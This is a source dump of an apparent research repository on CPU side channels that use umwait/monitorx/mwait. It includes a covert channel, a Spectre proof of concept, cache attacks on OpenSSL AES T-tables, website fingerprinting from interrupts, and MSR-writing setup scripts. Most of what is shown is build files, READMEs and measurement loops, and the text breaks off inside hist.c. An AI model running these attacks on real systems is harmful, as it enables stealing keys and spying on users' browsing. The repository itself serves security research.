├── covert_channel_eval
    ├── run.sh
    ├── Makefile
    ├── README.md
    ├── validate.py
    ├── main.c
    └── recv.txt
├── website_classify
    ├── requirements.txt
    └── classify2.py
├── Intel-umwait
    ├── Makefile
    ├── README.md
    └── hist.c
├── comparison
    ├── fr
    │   ├── Makefile
    │   └── main.c
    ├── pp
    │   ├── Makefile
    │   ├── eviction.h
    │   ├── main.c
    │   └── eviction.c
    ├── ps
    │   ├── Makefile
    │   ├── eviction.h
    │   ├── main.c
    │   └── eviction.c
    ├── naive-tsx
    │   ├── Makefile
    │   └── main.c
    ├── umwait
    │   ├── Makefile
    │   └── main.c
    └── README.md
├── spectral
    ├── Makefile
    ├── test.sh
    ├── README.md
    ├── main.c
    └── cacheutils.h
├── timed_mwait_feat
    ├── run.sh
    ├── Makefile
    ├── enable-msr.sh
    ├── README.md
    └── hello.c
├── aes_example
    ├── umwait
    │   ├── Makefile
    │   └── main.cpp
    ├── fr
    │   ├── Makefile
    │   └── spy.cpp
    ├── calibration
    │   ├── Makefile
    │   ├── README.md
    │   ├── pad.c
    │   └── main.c
    ├── pp
    │   ├── eviction.h
    │   ├── Makefile
    │   ├── spy.cpp
    │   └── eviction.c
    └── README.md
├── irq_monitor
    ├── arm
    │   ├── Makefile
    │   ├── README.md
    │   └── main.c
    └── x86
    │   ├── Makefile
    │   ├── README.md
    │   └── main.c
├── website_fingerprinting
    ├── plot.py
    ├── run.sh
    ├── collect.sh
    ├── list_15.txt
    ├── Makefile
    ├── README.md
    ├── find_core.py
    ├── list.txt
    ├── main.c
    └── list_500.txt
├── trigger-tester
    ├── enable-msr.sh
    ├── Makefile
    ├── README.md
    ├── r0e.h
    ├── hist.c
    └── cacheutils.h
├── README.md
└── LICENSE


/covert_channel_eval/run.sh:
--------------------------------------------------------------------------------
1 | #! /bin/sh
2 | make
3 | ./main
4 | ./validate.py
5 | 


--------------------------------------------------------------------------------
/website_classify/requirements.txt:
--------------------------------------------------------------------------------
1 | sklearn
2 | sktime
3 | pandas
4 | tikzplotlib
5 | 


--------------------------------------------------------------------------------
/Intel-umwait/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	gcc hist.c -Os -lpthread -o hist
3 | clean:
4 | 	rm -f hist


--------------------------------------------------------------------------------
/comparison/fr/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	gcc main.c -o test -Os -pthread
3 | clean:
4 | 	rm -f test
5 | 


--------------------------------------------------------------------------------
/comparison/pp/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	gcc *.c -o test -Os -pthread -lm
3 | clean:
4 | 	rm -f test
5 | 


--------------------------------------------------------------------------------
/comparison/ps/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	gcc *.c -o test -Os -pthread -lm
3 | clean:
4 | 	rm -f test
5 | 


--------------------------------------------------------------------------------
/comparison/naive-tsx/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	gcc main.c -o test -Os -pthread
3 | clean:
4 | 	rm -f test
5 | 


--------------------------------------------------------------------------------
/comparison/umwait/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	gcc main.c -o main -Os -pthread
3 | clean:
4 | 	rm -f main
5 | 


--------------------------------------------------------------------------------
/covert_channel_eval/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	gcc main.c -Os -lpthread -o main
3 | clean:
4 | 	rm -f main
5 | 
6 | 


--------------------------------------------------------------------------------
/spectral/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	gcc main.c -lpthread -o main -static -lm -O3
3 | clean:
4 | 	rm -f main
5 | 
6 | 


--------------------------------------------------------------------------------
/timed_mwait_feat/run.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | sudo ./enable-msr.sh
3 | make
4 | sudo insmod hello.ko && sleep 1 && sudo rmmod hello
5 | 
6 | sudo dmesg | grep "Avg:"
7 | 


--------------------------------------------------------------------------------
/covert_channel_eval/README.md:
--------------------------------------------------------------------------------
1 | # Covert Channel
2 | 
3 | Creates a simple covert channel with umonitor
4 | 
5 | Run using `./run.sh` to evaluate the covert channel.
6 | 


--------------------------------------------------------------------------------
/aes_example/umwait/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	g++ -std=gnu++11 main.cpp -O0 -lpthread -o main -g -I/home/rzhang/openssl/include/openssl/ -L/home/rzhang/openssl/ -lcrypto
3 | clean:
4 | 	rm -f main
5 | 
6 | 


--------------------------------------------------------------------------------
/aes_example/fr/Makefile:
--------------------------------------------------------------------------------
1 | all: spy
2 | clean:
3 | 	rm -f *.o spy
4 | spy: spy.cpp ../cacheutils.h
5 | 	g++ -std=gnu++11 -O2 -o $@ $< -I/home/rzhang/openssl/include/openssl/ -L/home/rzhang/openssl/ -lcrypto 
6 | 


--------------------------------------------------------------------------------
/timed_mwait_feat/Makefile:
--------------------------------------------------------------------------------
1 | obj-m += hello.o
2 | 
3 | KVERSION = $(shell uname -r)
4 | 
5 | all:
6 | 	make -C /lib/modules/$(KVERSION)/build M=$(PWD) modules
7 | clean:
8 | 	make -C /lib/modules/$(KVERSION)/build M=$(PWD) clean


--------------------------------------------------------------------------------
/irq_monitor/arm/Makefile:
--------------------------------------------------------------------------------
 1 | all: umonitor monitorx
 2 | 
 3 | umonitor:
 4 | 	gcc main.c -Os -lpthread -o main -pthread -lrt -DUMONITOR
 5 | monitorx:
 6 | 	gcc main.c -Os -lpthread -o main -pthread -lrt -DMONITORX
 7 | 
 8 | clean:
 9 | 	rm -f main
10 | 
11 | 


--------------------------------------------------------------------------------
/aes_example/calibration/Makefile:
--------------------------------------------------------------------------------
 1 | all: pad Ttable
 2 | 
 3 | pad:
 4 | 	gcc pad.c -Os -lpthread -o pad
 5 | Ttable:
 6 | 	gcc main.c -Os -lpthread -o Ttable -g -I/home/rzhang/openssl/include/openssl/ -L/home/rzhang/openssl/ -lcrypto
 7 | clean:
 8 | 	rm -f pad Ttable
 9 | 
10 | 


--------------------------------------------------------------------------------
/Intel-umwait/README.md:
--------------------------------------------------------------------------------
1 | # UMONITOR/UMWAIT Test
2 | 
3 | Tests if the `umonitor/umwait` instructions work on the current processor. 
4 | 
5 | Run using `./hist`. Press `return` to start the trigger thread on a different CPU. The number of wakeups per second should increase if this intruction pair works.


--------------------------------------------------------------------------------
/website_fingerprinting/plot.py:
--------------------------------------------------------------------------------
 1 | import matplotlib.pyplot as plt
 2 | import sys
 3 | 
 4 | legends = []
 5 | for p in sys.argv[1:]:
 6 |     d = [ int(x) for x in open(p).read().strip().split("\n") ]
 7 |     plt.plot(d)
 8 |     legends.append(p)
 9 | plt.legend(legends)
10 | plt.show()
11 | 
12 | 


--------------------------------------------------------------------------------
/website_fingerprinting/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | count=10
 3 | 
 4 | while read -r line
 5 | do
 6 |     domain=$(echo "$line" | awk -F/ '{print $3}' | sed 's/\./ /g' | awk '{print $2}')
 7 |     echo "Collecting $domain ($line)"
 8 |     ./collect.sh "$line" "$domain" $count
 9 | done < results/list.txt
10 | 


--------------------------------------------------------------------------------
/comparison/pp/eviction.h:
--------------------------------------------------------------------------------
 1 | #ifndef EVICTION_H
 2 | #define EVICTION_H
 3 | 
 4 | typedef struct elem
 5 | {
 6 |     struct elem *next;
 7 |     struct elem *prev;
 8 |     int set;
 9 |     size_t delta;
10 |     char pad[32]; // up to 64B
11 | } Elem;
12 | 
13 | Elem* evset_find(void* addr);
14 | 
15 | #endif /* EVICTION_H */
16 | 


--------------------------------------------------------------------------------
/comparison/ps/eviction.h:
--------------------------------------------------------------------------------
 1 | #ifndef EVICTION_H
 2 | #define EVICTION_H
 3 | 
 4 | typedef struct elem
 5 | {
 6 |     struct elem *next;
 7 |     struct elem *prev;
 8 |     int set;
 9 |     size_t delta;
10 |     char pad[32]; // up to 64B
11 | } Elem;
12 | 
13 | Elem* evset_find(void* addr);
14 | 
15 | #endif /* EVICTION_H */
16 | 


--------------------------------------------------------------------------------
/timed_mwait_feat/enable-msr.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | #enable and make performance counters available, run it with sudo
4 | modprobe msr
5 | echo "2" > /sys/devices/cpu/rdpmc
6 | 
7 | #enable timed Mwait
8 | sudo bash -c 'modprobe msr; CUR=$(rdmsr 0xe2); ENABLED=$(printf "%x" $((0x$CUR | 2147483648))); wrmsr -a 0xe2 0x$ENABLED'
9 | 


--------------------------------------------------------------------------------
/trigger-tester/enable-msr.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | #enable and make performance counters available, run it with sudo
4 | modprobe msr
5 | echo "2" > /sys/devices/cpu/rdpmc
6 | 
7 | #enable timed Mwait
8 | sudo bash -c 'modprobe msr; CUR=$(rdmsr 0xe2); ENABLED=$(printf "%x" $((0x$CUR | 2147483648))); wrmsr -a 0xe2 0x$ENABLED'
9 | 


--------------------------------------------------------------------------------
/aes_example/pp/eviction.h:
--------------------------------------------------------------------------------
 1 | #ifndef EVICTION_H
 2 | #define EVICTION_H
 3 | 
 4 | typedef struct elem
 5 | {
 6 |     struct elem *next;
 7 |     struct elem *prev;
 8 |     int set;
 9 |     size_t delta;
10 |     char pad[32]; // up to 64B
11 | } Elem;
12 | 
13 | //Elem* evset_find(void* addr);
14 | 
15 | #endif /* EVICTION_H */
16 | 


--------------------------------------------------------------------------------
/spectral/test.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | rm -f log.txt log.csv
 4 | touch log.txt log.csv
 5 | for to in $(seq 20000 1000 200000);
 6 | do
 7 | 	echo $to
 8 | 	echo ": $to" >> log.txt
 9 | 	sudo wrmsr -a 0xe1 $(printf "0x%x" $to)
10 | 	./main 3 | tee res.txt
11 | 	cat res.txt >> log.txt
12 | 	echo $to,$(tail -1 res.txt) >> log.csv
13 | done
14 | sudo wrmsr -a 0xe1 0x186a0
15 | 


--------------------------------------------------------------------------------
/irq_monitor/x86/Makefile:
--------------------------------------------------------------------------------
 1 | all: umonitor monitorx monitor
 2 | 
 3 | umonitor:
 4 | 	gcc main.c -Os -lpthread -o intel-umonitor -pthread -lrt -DUMONITOR
 5 | monitorx:
 6 | 	gcc main.c -Os -lpthread -o amd-monitorx -pthread -lrt -DMONITORX
 7 | monitor:
 8 | 	gcc main.c -Os -lpthread -o monitor -pthread -lrt -DMONITOR
 9 | 
10 | clean:
11 | 	rm -f intel-umonitor amd-monitorx monitor
12 | 
13 | 


--------------------------------------------------------------------------------
/aes_example/calibration/README.md:
--------------------------------------------------------------------------------
 1 | # UMWAIT Calibration for AES T-table Attacks
 2 | 
 3 | Find an appropriate padding for distinguishing cache hits from cache misses by `./pad`
 4 | 
 5 | Then update the length of padding in `main.c T_INIT`
 6 | 
 7 | Find T-table addresses by `./Ttable`
 8 | 
 9 | Execute `export LD_LIBRARY_PATH=/home/rzhang/openssl:$LD_LIBRARY_PATH` before finding T-table Addresses
10 | 


--------------------------------------------------------------------------------
/irq_monitor/arm/README.md:
--------------------------------------------------------------------------------
1 | # Interrupt detection on ARMv8
2 | 
3 | Detects hardware interrupts using `wfi`. 
4 | 
5 | Set `CORE_VICTIM` to the core that handles network interrupts (check `/proc/interrupts`). 
6 | Run `./main`. In parallel, on any (other) core, run `bash -c 'while [ 1 ]; do curl localhost; done'`. 
7 | You should see **increases in wakeups** while the network card handles the connection. 
8 | 


--------------------------------------------------------------------------------
/aes_example/pp/Makefile:
--------------------------------------------------------------------------------
 1 | CXX      = g++
 2 | CXXFLAGS = -std=gnu++11 -I/home/rzhang/openssl/include/openssl/ -L/home/rzhang/openssl/ -lcrypto
 3 | CC       = gcc
 4 | CCFLAGS  = -lm
 5 | OBJS     = spy.o eviction.o
 6 | 
 7 | all: spy
 8 | clean:
 9 | 	rm -f *.o spy
10 | spy : $(OBJS)
11 | 	$(CXX) -o $@ $(OBJS) $(CXXFLAGS)
12 | 
13 | %.o : %.cpp
14 | 	$(CXX) -c $(CXXFLAGS) $<
15 | 
16 | %.o : %.c 
17 | 	$(CC) -c $(CCFLAGS) $<
18 | 


--------------------------------------------------------------------------------
/trigger-tester/Makefile:
--------------------------------------------------------------------------------
 1 | all: umonitor monitor monitorx monitor-intel
 2 | 
 3 | umonitor:
 4 | 	gcc hist.c -Os -lpthread -o test-umonitor -DUMONITOR
 5 | monitor:
 6 | 	gcc hist.c -Os -lpthread -o test-monitor -DMONITOR
 7 | monitorx:
 8 | 	gcc hist.c -Os -lpthread -o test-monitorx -DMONITORX
 9 | monitor-intel:
10 | 	gcc hist.c -Os -lpthread -o test-monitor-intel -DMONITOR_INTEL
11 | 
12 | 
13 | clean:
14 | 	rm -f hist
15 | 
16 | 


--------------------------------------------------------------------------------
/website_fingerprinting/collect.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | function usage {
 4 |     echo "collect <url> <label> <count>"
 5 |     exit 1
 6 | }
 7 | 
 8 | if [ "$1" == "" ];
 9 | then
10 |     usage
11 | fi
12 | if [ "$2" == "" ];
13 | then
14 |     usage
15 | fi
16 | if [ "$3" == "" ];
17 | then
18 |     usage
19 | fi
20 | 
21 | for i in $(seq $3);
22 | do
23 |     ./main-monitorx $1
24 |     mv log.txt $2_$i.txt
25 | done
26 | 
27 | 


--------------------------------------------------------------------------------
/website_fingerprinting/list_15.txt:
--------------------------------------------------------------------------------
 1 | https://www.google.com
 2 | https://www.youtube.com
 3 | https://www.tmall.com
 4 | https://www.facebook.com
 5 | https://www.qq.com
 6 | https://www.baidu.com
 7 | https://www.sohu.com
 8 | https://www.taobao.com
 9 | https://www.360.cn
10 | https://www.jd.com
11 | https://www.amazon.com
12 | https://www.yahoo.com
13 | https://www.wikipedia.org
14 | https://www.zoom.us
15 | https://www.netflix.com
16 | 


--------------------------------------------------------------------------------
/timed_mwait_feat/README.md:
--------------------------------------------------------------------------------
1 | # Timed MWAIT
2 | 
3 | Quick test for the undocumented timed MWAIT feature via a simple Linux kernel module.
4 | 
5 | Run `sudo ./run.sh`. It first enable this feature by writing to MSR 0xe2. Then the bit 31 of ECX of mwait indicates this feature is actually used. The timeout value is stored in the implicit 64-bits EDX:EBX registers pair.
6 | 
7 | You can see the timed MWAIT wakes due to the timeout (Set by `offset`)
8 | 


--------------------------------------------------------------------------------
/website_fingerprinting/Makefile:
--------------------------------------------------------------------------------
 1 | all: umonitor monitorx
 2 | 
 3 | arm: main.c core_observer.h
 4 | 	gcc main.c -Os -o main-wfi -pthread -DWFI
 5 | 
 6 | umonitor: main.c core_observer.h
 7 | 	gcc main.c -Os -lpthread -o main-umonitor -pthread -lrt -DUMONITOR
 8 | monitorx: main.c core_observer.h
 9 | 	gcc main.c -Os -lpthread -o main-monitorx -pthread -lrt -DMONITORX
10 | 
11 | core_observer.h:
12 | 	python3 find_core.py
13 | 
14 | clean:
15 | 	rm -f main-umonitor main-monitorx main-wfi core_observer.h
16 | 
17 | 
18 | 


--------------------------------------------------------------------------------
/comparison/README.md:
--------------------------------------------------------------------------------
1 | # Comparison 
2 | 
3 | Code of comparing Transient-Writes-Monitor (TWM) with other conventional side channels for detecting victim events.
4 | 
5 | The victim event is either a transient access or a transient write to a targeted cache line pinned to a different physical core than the attacker.
6 |  
7 | Each asynchronous event is triggered after the process relinquishes the CPU `sched_yield()` and waits for a delay loop `wait() in cacheutils.h`. 
8 | The iteration number is randomly selected below a decreasing threshold `(event_internal)`.


--------------------------------------------------------------------------------
/spectral/README.md:
--------------------------------------------------------------------------------
 1 | # Spectre PoC
 2 | 
 3 | Uses `umwait` as the covert channel in a Spectre attack. 
 4 | 
 5 | Run using `./main`. Every second it outputs the leakage rate, error rate, and true capacity. 
 6 | An optional parameter can be provided to stop the experiment after N seconds: `./main N`.
 7 | If this parameter is provided, it outputs the last leakage rate, error rate, and true capacity as CSVs. 
 8 | 
 9 | Run `./test.sh` to evaluate the leakage rate for different `umwait` timeouts from 1000 to 200000. 
10 | The result is stored in `log.csv`.
11 | 


--------------------------------------------------------------------------------
/trigger-tester/README.md:
--------------------------------------------------------------------------------
 1 | # Trigger Test
 2 | 
 3 | Tests various events (reads, writes, flushes, prefetches) to see what wakes up the different `mwait` instructions. 
 4 | 
 5 | Run using `sudo ./test-<monitor variant>`. 
 6 | 
 7 | If you are testing `mwait` instruction on Intel, make sure use `sudo ./enable-msr.sh` to enable timed `mwait` feature in advance.
 8 | 
 9 | On AMD, monitor and mwait can be made unprivileged by setting bit 10 of MSR `0xc0010015`.
10 | 
11 | `sudo bash -c 'modprobe msr; CUR=$(rdmsr 0xc0010015); ENABLED=$(printf "%x" $((0x$CUR | 1024))); wrmsr -a 0xc0010015 0x$ENABLED'`


--------------------------------------------------------------------------------
/website_fingerprinting/README.md:
--------------------------------------------------------------------------------
1 | # Website Fingerprinting
2 | 
3 | Simply run `make`, the `find_core.py` will be executed to find the core handling network interrupts. *On the arm, please run `make arm`*.
4 | 
5 | `main-monitorx` is for AMD machines, and `main-umonitor` is for the newest Intel processors that support `umwait` instruction. Please make sure that you execute the right one by setting in the `collect.sh`.
6 | 
7 | To collect the interrupt traces for different websites (where we list in `list_15.txt`, `list.txt`), simply run `./run.sh`. The `count` specifies how many pieces of data to collect for each website.
8 | 


--------------------------------------------------------------------------------
/irq_monitor/x86/README.md:
--------------------------------------------------------------------------------
 1 | # Interrupt detection
 2 | 
 3 | Detects hardware interrupts using `mwait-` variants. 
 4 | 
 5 | Set `CORE_VICTIM` to the core that handles network interrupts (check `/proc/interrupts`). 
 6 | Run `./main`. In parallel, on any (other) core, run `bash -c 'while [ 1 ]; do curl localhost; done'`. 
 7 | You should see **increases in wakeups** while the network card handles the connection. 
 8 | 
 9 | `umonitor/umwait` and `monitorx/mwaitx` are unprivileged Intel-/AMD-specific instructions and such that our first choice. 
10 | 
11 | `monitor/mwait` is privileged. If you want to test with it, monitor and mwait can be made unprivileged by setting bit 10 of MSR `0xc0010015`.
12 | 
13 | `sudo bash -c 'modprobe msr; CUR=$(rdmsr 0xc0010015); ENABLED=$(printf "%x" $((0x$CUR | 1024))); wrmsr -a 0xc0010015 0x$ENABLED'`


--------------------------------------------------------------------------------
/aes_example/README.md:
--------------------------------------------------------------------------------
 1 | # Attacks on AES T-table
 2 | 
 3 | ## Setup
 4 | The targeted version of openssl is 1.0.1e.
 5 | 
 6 | `export LD_LIBRARY_PATH=<openssl address>:$LD_LIBRARY_PATH`
 7 | 
 8 | Find T-table addresses by `nm <libcrypto.so address> | grep Te`
 9 | 
10 | ## Overview
11 | 
12 | ### f+r 
13 | Cache attack using `Flush+Reload`. 
14 | 
15 | The threshold `MIN_CACHE_MISS_CYCLES` needs to be reset.
16 | 
17 | ### p+p
18 | Cache attack using `Prime+Probe`. 
19 | The code finding the eviction set is a strongly modified version of [evsets](https://github.com/cgvwzq/evsets).
20 | 
21 | The Find Prime Access Patterns is found by the tool [PrimeTime](https://github.com/KULeuven-COSIC/PRIME-SCOPE/tree/main/primetime).
22 | 
23 | The threshold `EVICTION_THRESHOLD` and `PRIME_THRESHOLD` need to be reset.
24 | 
25 | ### calibration
26 | `pad.c`: code of finding an appropriate padding for TLT to distinguish cache hits from cache misses.
27 | `Ttable.c`: code of finding the T-table addresses.
28 | 
29 | ### umwait
30 | Cache attack using `Timing-less Timer(TLT)`.
31 | 
32 | The padding's length `T_INIT` needs to be reset.


--------------------------------------------------------------------------------
/irq_monitor/arm/main.c:
--------------------------------------------------------------------------------
 1 | #define _GNU_SOURCE
 2 | #include <stdio.h>
 3 | #include <string.h>
 4 | #include <sys/types.h>
 5 | #include <sys/stat.h>
 6 | #include <sys/time.h>
 7 | #include <sched.h>
 8 | #include <pthread.h>
 9 | #include <signal.h>
10 | 
11 | #define CORE_VICTIM 5
12 | 
13 | // time interval for observing number of wakeups (in microseconds)
14 | #define TIMER 100*1000
15 | 
16 | 
17 | #define TIMER_S  (TIMER / (1000000))
18 | #define TIMER_US (TIMER % (1000000))
19 | 
20 | struct itimerval timer = {
21 |     .it_interval = {.tv_sec = TIMER_S, .tv_usec = TIMER_US},
22 |     .it_value = {.tv_sec = TIMER_S, .tv_usec = TIMER_US}
23 | };
24 | 
25 | void pin_to_core(int core) {
26 |     cpu_set_t cpuset;
27 |     pthread_t thread;
28 | 
29 |     thread = pthread_self();
30 | 
31 |     CPU_ZERO(&cpuset);
32 |     CPU_SET(core, &cpuset);
33 | 
34 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
35 | }
36 | 
37 | volatile size_t cnt = 0, run = 0, sum = 0;
38 | 
39 | void sigalarm(int num) {
40 |     printf("Count: %zd\n", cnt);
41 |     cnt = 0;
42 | }
43 | 
44 | int main(int argc, char *argv[]) {
45 |     pin_to_core(CORE_VICTIM);
46 | 
47 |     signal(SIGALRM, sigalarm);
48 |     setitimer(ITIMER_REAL, &timer, NULL);
49 | 
50 |     while(1) {
51 |         asm volatile("wfi");
52 |         cnt++;
53 |     }
54 |     return 0;
55 | }
56 | 
57 | 


--------------------------------------------------------------------------------
/website_fingerprinting/find_core.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import requests
 3 | import time
 4 | 
 5 | def get_irqs():
 6 |     irq_info = {}
 7 |     all_irq = open("/proc/interrupts").read().strip().split("\n")
 8 |     for irq in all_irq:
 9 |         data = irq.split(":")
10 |         if len(data) == 2:
11 |             irq_info[data[0].strip()] = data[1].strip().split()
12 |     return irq_info
13 | 
14 | def irq_diff(irq1, irq2):
15 |     irq_diff = {}
16 |     for i in irq1:
17 |         irq_diff[i] = irq1[i]
18 |         for d in range(len(irq1[i])):
19 |             try:
20 |                 irq_diff[i][d] = abs(int(irq2[i][d]) - int(irq1[i][d]))
21 |             except:
22 |                 pass
23 |     return irq_diff
24 | 
25 | def irq_print(irq):
26 |     for i in irq:
27 |         print("%3s: " % i, end='')
28 |         for v in irq[i]:
29 |             print("%10s " % str(v), end='')
30 |         print("")
31 |         
32 | def irq_clean(irq):
33 |     cleaned = {}
34 |     for i in irq:
35 |         try:
36 |             int(i)
37 |         except:
38 |             continue
39 |         cleaned[i] = irq[i]
40 |         for v in range(len(irq[i])):
41 |             try:
42 |                 cleaned[i][v] = int(irq[i][v])
43 |             except:
44 |                 cleaned[i][v] = 0
45 |     return cleaned
46 | 
47 | start = get_irqs()
48 | for i in range(10):
49 |     r = requests.get('https://www.youtube.com')
50 | end = get_irqs()
51 | 
52 | network = irq_diff(start, end)
53 | #irq_print(network)
54 | clean = irq_clean(network)
55 | #irq_print(clean)
56 | 
57 | cores = []
58 | values = []
59 | for i in clean:
60 |     if sum(clean[i]) == 0:
61 |         continue
62 |     mv = max(clean[i])
63 |     cores.append(clean[i].index(mv))
64 |     values.append(mv)
65 | maxval = max(values)
66 | idx = values.index(maxval)
67 | 
68 | print("Core %d" % cores[idx])
69 | 
70 | o = open("core_observer.h", "w")
71 | o.write("#define CORE_OBSERVER %d\n" % cores[idx])
72 | o.close()
73 | 
74 | 


--------------------------------------------------------------------------------
/irq_monitor/x86/main.c:
--------------------------------------------------------------------------------
 1 | #define _GNU_SOURCE
 2 | #include <stdio.h>
 3 | #include <string.h>
 4 | 
 5 | #include <sys/types.h>
 6 | #include <sys/stat.h>
 7 | #include <sys/time.h>
 8 | #include <fcntl.h>
 9 | #include "cacheutils.h"
10 | #include <pthread.h>
11 | #include <sched.h>
12 | #include <immintrin.h>
13 | #include <signal.h>
14 | #include <linux/membarrier.h>
15 | 
16 | #define CORE_VICTIM 1
17 | 
18 | #define OFFSET (64 * 21)
19 | 
20 | #ifdef UMONITOR
21 | #define INSTR_MONITOR asm volatile("umonitor %%rax" : : "a"(test + OFFSET), "c"(0), "d"(0));
22 | #define INSTR_WAIT asm volatile("xor %%rbx, %%rbx; umwait %%rcx; jnc 1f; inc %%rbx; 1: nop" : "=b"(carry) : "a"(-1), "d"(-1), "c"(0));
23 | #define INSTR_NAME "UMONITOR"
24 | #endif
25 | #ifdef MONITORX
26 | #define INSTR_MONITOR asm volatile("monitorx" : : "a"(test + OFFSET), "c"(0), "d"(0));
27 | #define INSTR_WAIT asm volatile("mwaitx" : : "a"(-1), "d"(-1), "c"(0));
28 | #define INSTR_NAME "MONITORX"
29 | #endif
30 | #ifdef MONITOR
31 | #define INSTR_MONITOR asm volatile("monitor" : : "a"(test + OFFSET), "c"(0), "d"(0));
32 | #define INSTR_WAIT asm volatile("mwait" : : "a"(0), "c"(0));
33 | #define INSTR_NAME "MONITOR"
34 | #endif
35 | 
36 | // time interval for observing number of wakeups (in microseconds)
37 | #define TIMER 100*1000
38 | 
39 | 
40 | #define TIMER_S  (TIMER / (1000000))
41 | #define TIMER_US (TIMER % (1000000))
42 | 
43 | 
44 | 
45 | struct itimerval timer = {
46 |     .it_interval = {.tv_sec = TIMER_S, .tv_usec = TIMER_US},
47 |     .it_value = {.tv_sec = TIMER_S, .tv_usec = TIMER_US}
48 | };
49 | 
50 | void pin_to_core(int core) {
51 |     cpu_set_t cpuset;
52 |     pthread_t thread;
53 | 
54 |     thread = pthread_self();
55 | 
56 |     CPU_ZERO(&cpuset);
57 |     CPU_SET(core, &cpuset);
58 | 
59 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
60 | }
61 | 
62 | __attribute__((aligned(4096))) char test[4096 * 256];
63 | 
64 | volatile size_t cnt = 0, run = 0, sum = 0;
65 | 
66 | void sigalarm(int num) {
67 |     printf("Count: %zd\n", cnt);
68 |     if(cnt > 65) {
69 |         printf("IRQ!\n");
70 |     }
71 |     cnt = 0;
72 | }
73 | 
74 | /* Application entry */
75 | int main(int argc, char *argv[]) {
76 |     memset(test, 1, sizeof(test));
77 |     
78 |     pin_to_core(CORE_VICTIM);
79 | 
80 |     signal(SIGALRM, sigalarm);
81 |     setitimer(ITIMER_REAL, &timer, NULL);
82 | 
83 |     while(1) {
84 | #ifdef UMONITOR
85 |         INSTR_MONITOR
86 |         size_t carry = 0;
87 |         INSTR_WAIT
88 |         cnt += carry;
89 | #else
90 |         INSTR_MONITOR
91 |         INSTR_WAIT
92 |         cnt++;
93 | #endif
94 |     }
95 |     return 0;
96 | }
97 | 
98 | 


--------------------------------------------------------------------------------
/comparison/naive-tsx/main.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <stdint.h>
  4 | #include <stdlib.h>
  5 | #include <string.h>
  6 | #include <pthread.h>
  7 | #include <fcntl.h>
  8 | #include <time.h>
  9 | #include <sched.h>
 10 | #include "../cacheutils.h"
 11 | 
 12 | #define CORE1 2 
 13 | #define CORE2 3
 14 | 
 15 | #define OFFSET (64 * 21)
 16 | 
 17 | volatile char __attribute__((aligned(4096))) data[4096];
 18 | size_t event_internal = 500000;
 19 | 
 20 | void pin_to_core(int core) {
 21 |     cpu_set_t cpuset;
 22 |     pthread_t thread;
 23 | 
 24 |     thread = pthread_self();
 25 | 
 26 |     CPU_ZERO(&cpuset);
 27 |     CPU_SET(core, &cpuset);
 28 | 
 29 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 30 | }
 31 | 
 32 | void write_speculative2(void* ptr) {
 33 |     speculation_start(s);
 34 |     *(char*)ptr ^= 1;
 35 |     speculation_end(s);
 36 | }
 37 | 
 38 | int cnt = 0;
 39 | 
 40 | void* accessor(void* dummy) {
 41 |     pin_to_core(CORE2);
 42 |     int seed = time(NULL); srand(seed);
 43 |     //printf("Press key to continue\n");
 44 |     //getchar();
 45 |     //printf("Go!\n");
 46 | 
 47 |     while(1) {
 48 |         sched_yield();
 49 | 	    size_t r = rand() % event_internal + 1;
 50 | 
 51 |         wait(r);
 52 |         // wait(WINDOW_SIZE);
 53 | 
 54 |         //write_speculative2(data);
 55 |         write_speculative2(data+OFFSET); // CONTROL
 56 |         cnt++;
 57 |     }
 58 | }
 59 | 
 60 | int main() {
 61 |     memset(data, 1, sizeof(data));
 62 |     pin_to_core(CORE1);
 63 | 
 64 |     pthread_t pt;
 65 |     pthread_create(&pt, NULL, accessor, NULL);
 66 |     sched_yield();
 67 | 
 68 |     int pos = 0, t = 0;
 69 |     int start = time(NULL);
 70 |     int current = time(NULL);
 71 | 
 72 |     size_t window_size = 10;
 73 |     size_t delta = 0;
 74 | 
 75 |     while(1) {
 76 | 
 77 |         if(xbegin() == (~0u)) {
 78 |             data[0] ^= 1;
 79 | 	    for (int i = 0; i < 1000; i++) asm volatile("nop\n");
 80 |             xend();
 81 |         } else {
 82 |             pos++;
 83 |         }
 84 | 
 85 | 	    current = time(NULL);
 86 |         if(start != current) {
 87 |             start = current;
 88 | 
 89 |             printf("%5d / %5d (%.2f)\n", pos, cnt, pos * 100.0 / cnt);
 90 | 	        t++;
 91 |             pos = 0;
 92 |             cnt = 0;
 93 | 
 94 |             if (t == 100) {
 95 |                 event_internal = event_internal * 4 / 5;
 96 |                 printf("event_internal alters!!!\n\n");
 97 |                 t = 0;
 98 |                 if (event_internal < 1000)
 99 |                     break;
100 |             }
101 | 
102 |         }
103 |     }
104 | 
105 | }
106 | 
107 | 


--------------------------------------------------------------------------------
/Intel-umwait/hist.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | 
  5 | #include <sys/types.h>
  6 | #include <sys/stat.h>
  7 | #include <fcntl.h>
  8 | #include <pthread.h>
  9 | #include <sched.h>
 10 | #include <immintrin.h>
 11 | #include <signal.h>
 12 | #include "cacheutils.h"
 13 | 
 14 | #define CORE_VICTIM 1
 15 | #define CORE_ATTACKER 0
 16 | 
 17 | #define OFFSET (64 * 21)
 18 | #define INSTR_MONITOR asm volatile("umonitor %%rax" : : "a"(test+OFFSET), "c"(0), "d"(0));
